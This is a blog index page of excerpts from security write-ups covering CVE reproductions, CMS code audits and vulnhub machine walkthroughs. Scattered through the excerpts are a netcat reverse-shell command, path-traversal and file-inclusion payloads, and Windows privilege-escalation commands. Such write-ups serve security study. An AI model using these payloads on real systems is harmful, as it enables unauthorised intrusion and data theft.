自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

ximo的博客

兮 沫

  • 博客(79)
  • 收藏
  • 关注

原创 MongoDB 未授权访问漏洞学习

漏洞简介MongoDB 是一个基于分布式文件存储的数据库。由 C++ 语言编写。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。MongoDB 是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。造成未授权访问的根本原因就在于启动 Mongodb 的时候未设置 --auth 也很少会有人会给数据库添加上账号密码(默认空口令),使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。环境搭建这里使用的是kali linux。dock

2021-05-14 18:41:36 698 1

原创 Redis未授权访问漏洞学习

漏洞简介部分 Redis 绑定在 0.0.0.0:6379,并且没有开启认证(这是Redis 的默认配置),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,将会导致 Redis 服务直接暴露在公网上,导致其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用

2021-05-13 16:33:04 314

原创 YCCMS 代码审计

CMS简介YCCMS是一款PHP版轻量级CMS建站系统。程序页面设计简洁,生成静态html,后台功能强大。利于优化、超强收录、超强排名。适合做关键词排名、淘宝客程序,是个人、企业建站的理想选择。YCCMS采用PHP5+MYSQL做为技术基础进行开发,OOP(面向对象),MVC模块化开发,代码易维护,方便功能扩展和二次开发。更高效、更安全、更稳定。下载地址http://ahdx.down.chinaz.com/202003/yccms_v3.4.rar代码审计修改管理员账号密码(越权)在未登录情

2021-05-11 19:25:24 1097 1

原创 狂雨小说(KYXS)CMS 代码审计

CMS介绍狂雨小说内容管理系统(以下简称KYXSCMS)提供一个轻量级小说网站解决方案,基于ThinkPHP5.1+MySQL的技术开发。KYXSCMS,灵活,方便,人性化设计简单易用是最大的特色,是快速架设小说类网站首选,只需5分钟即可建立一个海量小说的行业网站,批量采集目标网站数据或使用数据联盟,即可自动采集获取大量数据。内置标签模版,即使不懂代码的前端开发者也可以快速建立一个漂亮的小说网站。环境搭建下载链接:http://bbs.kyxscms.com/?t/1.html我这里使用的是php

2021-05-06 19:56:17 1453

原创 Sudo本地提权(CVE-2021-3156)漏洞 And OverlayFS(CVE-2021-3493) Ubuntu 漏洞

Sudo本地提权漏洞概述Sudo命令,允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码。影响版本Sudo 1.8.2 - 1.8.31p2Sudo 1.9.0 - 1.9.5p1漏洞

2021-05-03 10:32:03 310

原创 极致CMS 漏洞简单分析

环境搭建极致CMS1.6.7下载地址:https://www.jizhicms.cn/thread-95-1-1.html目录框架 404.html A 后台控制文件 Conf 公共函数 FrPHP框架 Home 前台控制文件 Public 公共静态文件 README.md admin.php 后台入口 backup 备份 cache 缓存 favicon.ico index.php 前台入口 install readme.txt static 静态文件 web.co

2021-05-02 10:34:04 4903 5

原创 Weblogic LDAP 远程代码执行漏洞复现【CVE-2021-2109】

漏洞概述Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞(CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。影响范围WebLogic Server 10.3.6.0.0

2021-04-29 16:29:51 815

原创 Apache Solr RCE (CVE-2020-13957)未授权上传漏洞 + Velocity模板远程执行(CVE-2019-17558)复现

漏洞概述(CVE-2020-13957)未授权上传漏洞:在特定的Solr版本中ConfigSet API存在未授权上传漏洞 ,配合CVE-2019-17558可执行任意命令。(CVE-2019-17558)Velocity模板远程执行:攻击者在知道Solr服务器上Core名称后,先把params.resource.loader.enabled设置为true(就可加载指定资源),再进行远程执行命令。配合CVE-2020-13957上传漏洞上传Core,进行攻击。影响版本CVE-2020-1395

2021-04-28 09:35:43 481

原创 Apache Druid (CVE-2021-25646)远程代码执行漏洞复现

漏洞概述Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以

2021-04-27 19:22:12 735 1

原创 Weblogic (CVE-2018-2894)任意文件上传漏洞复现

漏洞概述Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制。利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。影响范围10.3.612.1.312.2.1.212.2.1.3环境搭建docker+vulhub访问http://IP地址:7001:搭建成功。漏洞复现访问/console:使用:docker-comp

2021-04-26 20:05:39 2584

原创 Apache Tomcat(CVE-2017-12615)远程代码执行漏洞复现

漏洞描述2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,其中就有远程代码执行漏洞(CVE-2017-12615)。当 启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。影响版本Apache Tomcat 7.0.0 - 7.0.81环境搭建docker +

2021-04-25 21:39:19 710

原创 熊海CMS 1.0 代码审计

前言前两个审计的cms不是很友好(一个环境有点问题,另一个全是xss)。这个cms看起来不错,内容相对来说比较丰富,希望能有个快乐的审计过程。开始先看看大致框架:——admin //后台文件 ——css //css文件 ——files //功能函数文件 ——images //图片 ——index.php //主目录文件 ——install //安装文件 ——seacmseditor //编辑器 ——templa

2021-04-21 20:32:09 591 3

原创 MiniCMS 1.10 代码审计

前言前一个bluecms审计的不是很好(第一次审,一点思路都没有)。这一次,打算先对站点进行一些测试,找到漏洞后,再对应的进行审计。开始当然,先扫一波0.0。。然后看一下网站的结构(因为这个cms比较小,好审):index.php:先引入/mc-files/mc-core.php,再通过该文件引入配置文件mc-conf.php以及定义的函数文件mc-tags.php前台目录: mc-files: mc-conf.php:主页的配置文件。 mc-core.php:404访问文件;包含

2021-04-20 19:45:30 243

原创 bluecms1.6 代码审计【失败的一次】

前言正处于hvv阶段,但是因为学校原因,并没有参加这次hvv。好在,跟着各位师傅们的努力成果,也做了一些1day,也提交了一些src(希望能过)。接下来开启新的学习之路—代码审计。主要目的:加强阅读代码的能力。(主要是跟着师傅们学0.0)环境Windows xp(win 7 有点问题)phpstudybluecms 1.6开始...

2021-04-19 21:56:16 299 3

原创 (CVE-2020-21224)浪潮ClusterEngineV4.0 远程命令执行漏洞复现

简介浪潮 Inspur ClusterEngine是中国浪潮公司的一个应用软件。提供管理集群系统中软硬件提交的作业。漏洞描述浪潮服务器群集管理系统存在危险字符未过滤,导致远程命令执行影响版本浪潮ClusterEngineV4.0FOFAtitle="TSCEV4.0"复现过程FOFA搜索:登录页面:输入账号密码,进行抓包:页面不存在验证码,且存在用户名枚举,进行暴力破解:通过fuzz,发现在用户名或密码任意一处添加 ’ ,会报错:正常输入:添加单引号:添加分号,

2021-04-14 09:11:18 3329

原创 SSRF漏洞简单总结

目录SSRF漏洞介绍SSRF漏洞原理主要攻击方式SSRF防御SSRF漏洞介绍SSRF(服务器请求伪造):由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标无法访问内部系统,但是请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内网SSRF漏洞原理由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。例如:黑客操作服务器端从指定的URL地址获取网页文本内容,加载指定地址的图片等;利用存在漏洞的web应用作为代理攻击远程和本地服务器。

2021-04-12 20:05:45 246

原创 内网渗透--MS14-068【复现】

漏洞概述该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。影响版本全部版本Windows服务器环境搭建域:hack.com域控:win 2008 R2 192.168.133.100域内主机:win 7 192.168.133.101复现过程假设已经获得了域内主机win 7的控制权;查看用户是否为域用户:net user hack1 /domain获取域控信息:net group "domain controllers" /domainpi

2021-04-11 12:11:36 313

原创 内网渗透--域环境搭建

目录环境准备域控搭建域客户机搭建测试环境准备三台主机:Windows Server 2008 R2(域控)Windows XPWindows 07域控搭建主机:Windows Server 2008 R2Win+R,输入dcpromo,安装AD域二进制文件:点击下一步,选择如图:下一步,设置域名:选择server 2008 r2,下一步:等待时可以进行IP设置:建议设置与kali同一网段(能互通)。继续上一步:点击是:使用默认:设置密码:下一步,等

2021-04-10 16:52:23 195

原创 靶机测试--SickOs1.2【PUT漏洞】

目录PUT漏洞信息收集漏洞利用反弹shell提权PUT漏洞通过PUT请求方式,上传文件。参考链接:https://www.cebnet.com.cn/20180810/102513443.html信息收集主机发现:端口扫描:目录扫描:漏洞利用一、探测服务器是否开启PUT方式burpsuite探测二、上传文件1.burpsuite上传:修改为PUT方式,并在存在PUT漏洞的的目录下创建文件及文件内容。查看目录:执行命令:2.curl 命令上传:curl -i -

2021-04-04 13:20:47 325

原创 (CVE-2020-17530)Struts2 S2-061 远程命令执行漏洞【复现】

简介Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。漏洞概述S2-061是对S2-059的绕过,Struts2官方对S2-059的修复方式是加强OGNL表达式沙盒,而S2-061绕过了该沙盒。影响版本Struts 2.0.0-Struts 2.5.25环境搭建使用vulhub+docker环境,进入漏洞目录,启动:/vulhub/vulhub-maste

2021-04-02 18:21:05 385

原创 (CVE-2020-16846)SaltStack命令注入漏洞【复现】

简介SaltStack管理工具允许管理员对多个操作系统创建一个一致的管理系统,包括VMware vSphere环境。通过部署SaltStack,我们可以在成千万台服务器上做到批量执行命令,根据不同业务进行配置集中化管理、分发文件、采集服务器数据、操作系统基础及软件包管理等。漏洞概述CVE-2020-25592允许任意用户调用SSH模块。CVE-2020-16846允许用户执行任意命令。CVE-2020-16846和CVE-2020-25592组合使用可在未授权的情况下通过salt-api接口执行任

2021-04-01 15:14:28 362

原创 CVE-2020-17519/17518 Apache Flink 文件操作漏洞复现

简介Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。漏洞简介CVE-2020-17518攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的)。CVE-2020-17519Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问

2021-03-31 09:09:20 410

原创 (CNVD-2021-14544)海康威视流媒体管理服务器任意文件读取【复现】

简介海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。漏洞说明杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞和任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。漏洞复现Fofa搜索标题:title="流媒体管理服务器"找到存在弱口令的后台:admin/12345在日志下载中进行抓包:构造payload:../../../../../../../windows/system32/drivers/etc/hosts可进行下载。...

2021-03-30 10:23:15 2587 1

原创 靶机测试--Dina

目录信息收集主机发现端口扫描目录扫描漏洞发掘提权总结信息收集主机发现端口扫描只有80端口:目录扫描访问每一个可以访问的路径:主页:nothing/pass:secure/:漏洞发掘得到了一个类似密码字典,一个zip文件。下载zip文件:需要密码,使用获得的密码freedom,解压后为mp3格式,但是无法播放:使用文本打开:获得了用户名和一个后台,打开:使用diana可以成功登录:网站框架为playsms。搜索CMS漏洞:有三个属于msf,使用msf

2021-03-28 16:53:42 281 1

原创 靶机测试--bulldog2【逻辑漏洞】

目录信息收集主机发现端口扫描目录扫描漏洞发掘提权总结信息收集主机发现端口扫描目录扫描漏洞发掘访问主页:首先,下方有两个连接;左边的可以查看其他用户的信息:右边跳转至注册页面,但是注册关闭:还有一个登录页面:可以尝试弱口令,注入,暴力破解,枚举等。随便填写一个,进行抓包:返回的验证为false,将其修改为true,若成功登录,说明存在逻辑漏洞。结果失败。下载前端js代码:进行格式化,搜索关键信息:找到上图所示代码段,根据登录的数据包格式,猜测可能是注册数

2021-03-28 12:27:40 309

原创 vulnhub靶机测试--Kioptrix 3

目录前言信息收集主机发现端口扫描目录扫描漏洞利用提权总结前言这个系列基本上没有web方面的漏洞,都是系统、CMS版本漏洞;主要是了解一下提权方法。信息收集主机发现端口扫描目录扫描漏洞利用访问80端口:第一个页面有个page参数,试了试文件包含,失败。第二个页面有个system参数,命令执行漏洞?? 失败。第三个页面是一个登录页面,同时知道了CMS。再看看其他目录:1.数据库登录后台2.一个看不懂的(没加载,速度慢的网页):3.目录遍历,但是啥用没有。查找CMS

2021-03-25 19:58:54 299

原创 Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)复现

简介Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞。影响版本Nexus Repository Manager OSS/Pro 3.x <= 3.21.1环境搭建docker环境+vulhub。git clone https://github.com/vulhub/vulhub.git启动环境后,访问 ip:8081 :漏洞复现使用账号密码adm

2021-03-25 13:45:29 512

原创 vulnhub靶机测试--CH4INRULZ_v1.0.1

目录信息收集主机发现端口扫描目录扫描漏洞发现及利用反弹shell提权总结信息收集主机发现端口扫描四个端口。有两个开启http服务。目录扫描1.80端口:2.8011端口:漏洞发现及利用1.先走80端口:主页没有什么信息。访问其他目录:/LICENSE:无用信息。/robots(.txt)/development:一个登陆点,暂时搁置。/vendor/:目录遍历,但是没有有用的信息。2.再看看8011端口:只有一个目录,api:这个API将用于与F

2021-03-24 21:33:12 245 1

原创 Apache Unomi 远程代码执行漏洞(CVE-2020-13942)复现

简介Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。 另外,Druid 还有一个关键的特点:它支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景中用到它。漏洞描述在Druid 0.20.0及更早版本中,经过身份验证的用户可以发送特制请求,以强制Druid为该请求运行用户提供的JavaScript

2021-03-24 10:46:46 241

原创 vulnhub靶机测试--dpwnn 01

目录信息收集主机发现端口扫描目录扫描漏洞发现及利用提权总结信息收集主机发现端口扫描80 http服务;22 ssh;3306 MySQL。目录扫描就一个info.php漏洞发现及利用访问80端口:访问info.php:给出了phpinfo信息。但是没有什么可以利用的点。web端其实没什么东西。访问3306端口,连接MySQL:直接弱口令(其实没有密码,直接进来。。。。。。)正常操作,获得账号信息:获得ssh账号密码。进行连接:提权使用sudo查看suid权

2021-03-23 21:58:17 104

原创 Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)复现

漏洞简介在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们通过传入Accept: ../../../../../../../../etc/passwd{{头来构成构造路径穿越漏洞,读取任意文件。复现过程访问首页,访问robots.txt:进行抓包,构造payload:使用msf框架:设置选项:运行:查看结果:...

2021-03-23 10:08:05 168

原创 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)复现

CVE-2018-12613简介:phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。搭建环境:使用docker+vulhub的环境。复现过程:访问:index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd可以查看到文件信息:说明存在文件包含。在sql中执行SELECT '<?=phpinfo()?&gt

2021-03-22 20:31:33 918

原创 Windows本地提权

1.PsExec提权PsExec -i -s cmd //-i 交互式 -s syetem权限 打开cmd窗口2.at 方式提权(xp,2003)at 00:00 /interactive cmd 指定时间执行cmd,获得system权限。操作系统中,who执行命令,命令就拥有who权限。使用system打开任务管理器:taskmgr结束explorer.exe(桌面进程,权限为管理员):桌面图标消失,任务栏消失。再打开一个桌面进程(文件,创建新任务):权限为系

2021-03-20 15:07:12 477

原创 靶机测试--DC(4)

目录信息收集主机发现端口扫描漏洞发现及利用反弹shell提权总结信息收集主机发现端口扫描漏洞发现及利用访问80:一个登录框,还给出了用户名admin。爆破密码:happy;登录。一个可以执行命令的页面:抓包,进行修改:存在命令执行漏洞。反弹shellnc -e /bin/bash ip地址 端口在home目录下发现三个用户:依次打开这三个目录:只有jim目录下有文件:打开后发现:打开文件,可能是个密码文件。使用hydra进行ssh爆破:使用ssh进行

2021-03-19 19:27:24 103

原创 CVE-2021-3019【Lanproxy 任意文件读取漏洞复现】

简介lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,目前仅支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面…)。目前市面上提供类似服务的有花生壳、TeamViewer、GoToMyCloud等等,但要使用第三方的公网服务器就必须为第三方付费,并且这些服务都有各种各样的限制,此外,由于数据包会流经第三方,因此对数据安全也是一大隐患。影响版本lanproxy 0.1漏洞概述本次Lanproxy 路径遍历漏洞 (CVE-2021-

2021-03-19 16:15:29 436

原创 Nmap基本用法

基本用法对单台设备进行扫描nmap [IP地址]对IP地址不连续的多台设备进行扫描nmap [IP地址1] [IP地址2] [IP地址3] //以空格隔开对连续范围内的多台设备进行扫描nmap [IP地址的范围]对子网设备进行扫描nmap [IP地址/掩码位数]-sn参数只进行活跃状态扫描进行设备发现使用ARP进行设备发现参数:-PR(nmap7.8版本已经弃用)这种方式仅能用于与Nmap所在设备同一网段的目标。nmap -sn [IP地址]

2021-03-19 15:20:17 279

原创 CVE-2019-6339(Drupal 远程代码执行漏洞) 复现

CVE-2019-6339(Drupal 远程代码执行漏洞) 复现环境由vuhlub+docker搭建。DrupalDrupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成;Drupal是一套开源的内容管理平台,拥有多种功能,可以用来建设从个人网站到大型社区网站。网站搭建访问http://your-ip:8080/,进行环境搭建:这里要选择英文,然后默认下一步。数据库选择sqlite:搭建完成:漏洞复现

2021-03-18 15:46:43 785

原创 靶机测试--DC(3)

目录信息收集主机发现端口扫描目录扫描漏洞发现及利用提权总结信息收集主机发现端口扫描目录扫描漏洞发现及利用访问80端口:一个登录页面,一段文字:这一次,只有一面旗帜,一个切入点,没有任何线索。获得该标志,显然必须获得root权限。你如何成为根取决于你-显然,系统。祝你好运-我希望你喜欢这个小挑战。????enen就一条路,提权。进入登录后台:由joomla搭建的平台,使用joomla专门的扫描器:获得了版本信息。在exploit库中查找对应版本漏洞:sql注

2021-03-17 19:50:16 145

原创 GKCTF2020 - Web(老八小超市儿)

[GKCTF2020]老八小超市儿基于shopxo开源系统的题目,默认登录后台为admin.php。账号:admin 密码:shopxo在这个页面上传zip文件,给了下载链接。在zip文件的\default\_static_目录下上传木马文件:上传,访问php文件(/public/static/index/default/ctf.php):使用蚁剑进行连接:在跟目录下存在flag,但是是个假的。还有一个flag.hint文件:获得root?,说明flag在root目录下,但是没有

2021-03-17 17:31:56 190

原创 ThinkPHP 2.x 任意代码执行漏洞【复现】

ThinkPHP 2.x 任意代码执行漏洞漏洞描述:ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。漏洞复现POC:

2021-03-17 09:51:53 634

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除